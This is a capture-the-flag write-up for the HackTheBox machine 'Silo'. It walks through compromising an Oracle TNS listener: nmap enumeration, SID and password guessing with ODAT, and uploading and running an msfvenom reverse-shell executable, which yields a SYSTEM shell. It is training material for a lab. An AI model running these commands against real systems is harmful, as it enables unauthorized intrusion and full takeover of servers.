Preface: Silo is a medium box on HackTheBox.eu.
With an basic nmap scan we will find a bunch of open ports. But the most interesting one is the port 1521. There is a “Oracle TNS listener” running on it. After some enumeration I found an CVE for the service. With ODAT we are able to discover further informations which enable us to upload and execute files.
We will upload and execute our own reverse shell and get directly the administrator shell.
Information gathering
As always we start with an nmap scan for open ports and services:
$ sudo nmap -sC -sV -oN nmap/silo.nmap 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 19:33 CET
Nmap scan report for 10.10.10.82
Host is up (0.14s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 9m31s, deviation: 0s, median: 9m30s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-13T18:45:21
|_ start_date: 2021-02-13T18:42:18
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.61 seconds
We get a bunch of ports but the most interesting one is 1521. Because there runs a Oracle TNS listener service which allows unauthorized access.
After a bit enumeration on google I found the CVE-2012-1675. Which is a “TNS Listener Poison Attack”.
I also found a nmap script oracle-tns-poison.nse to verify the vulnerability.
So let’s verify it the box is vulnerable to the CVE-2012-1675.
First we clone the GitHub repo and change our directory to it:
$ git clone https://github.com/bongbongco/CVE-2012-1675.git
$ cd CVE-2012-1675
Now we can verify it. There is also a example in the README.md.
$ nmap -Pn -sT --script=./oracle-tns-poison -p 1521 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 19:51 CET
NSE: DEPRECATION WARNING: bin.lua is deprecated. Please use Lua 5.3 string.pack
Nmap scan report for silo.htb (10.10.10.82)
Host is up (0.23s latency).
PORT STATE SERVICE
1521/tcp open oracle
|_oracle-tns-poison: Host is vulnerable!
Nmap done: 1 IP address (1 host up) scanned in 0.60 seconds
Awesome! The host is vulnerable so we can use it.
Exploitation
We discovered the vulnerability of the box. No we have to search for an existing exploit or tool that we can use for our case.
After a while I found the ODAT (Oracle Database Attacking Tool).
In the README.md I found a module for our CVE-2012-1675. So let’s try this tool.
First we have to clone the repo and change our directory to it:
$ git clone https://github.com/quentinhardy/odat.git
$ cd odat
Now we can try the tnspoison module:
$ python3 odat.py tnspoison -s 10.10.10.82 --test-module
07:43:54 CRITICAL -: The server SID or Service Name must be given with the '-d SID' or '-n serviceName' option.
But we need the server SID. Let’s see how we can discover it.
The help menu of odat.py show’s us a module sidguesser. I think this is what we need.
$ python3 odat.py sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
############################################################################################################### | ETA: 00:00:00
100% |###########################################################################################################| Time: 00:01:30
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###########################################################################################################| Time: 00:00:02
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... ############################################################################## | ETA: 00:00:08
100% |###########################################################################################################| Time: 00:01:13
[+] SIDs found on the 10.10.10.82:1521 server: XE
And we got our SID: XE
Now we can test again the tnspoison module. I always try to verify the vulnerability before I ran into a rabbit hole.
$ python3 odat.py tnspoison -s 10.10.10.82 -d XE --test-modul
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
Yes, it works. In the help menu of odat.py I saw the module passwordguesser. Maybe we can extract some credentials. Because we got the SID. This is mostly always required for the modules.
$ python3 odat.py passwordguesser -s 10.10.10.82 -d XE
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
....
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
Awesome! We found some valid credentials. So maybe we are able to upload our reverse shell.
There is a module named utlfile. With this we can upload/download/delete files. But first we have to create our reverse shell.
I will use msfvenom for it:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > qwertty.exe
Now we can upload it with the odat.py
$ python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile c:/ qwertty.exe ../qwertty.exe
[1] (10.10.10.82:1521): Put the ../qwertty.exe local file in the c:/ folder like qwertty.exe on the 10.10.10.82 server
[+] The ../qwertty.exe file was created on the c:/ directory on the 10.10.10.82 server like the qwertty.exe file
Nice, the file was created on the box.
No let’s start our nc listener on port 4444
$ nc -lvnp 4444
Now we can use the module externaltable. It took me a while to discover this module because it is not an obvious name for what we was looking for.
But the description says what we want:
to read files or to execute system commands/scripts
Let’s try it:
$ python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec c:/ qwertty.exe
[1] (10.10.10.82:1521): Execute the qwertty.exe command stored in the c:/ path
Hopefully we got the reverse shell. Let’s check our nc listener:
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>
Nice! We got the shell. Now we can grab the user and root flag.
SHELL: nt authority\system
Thanks for reading! I hope you enjoyed it!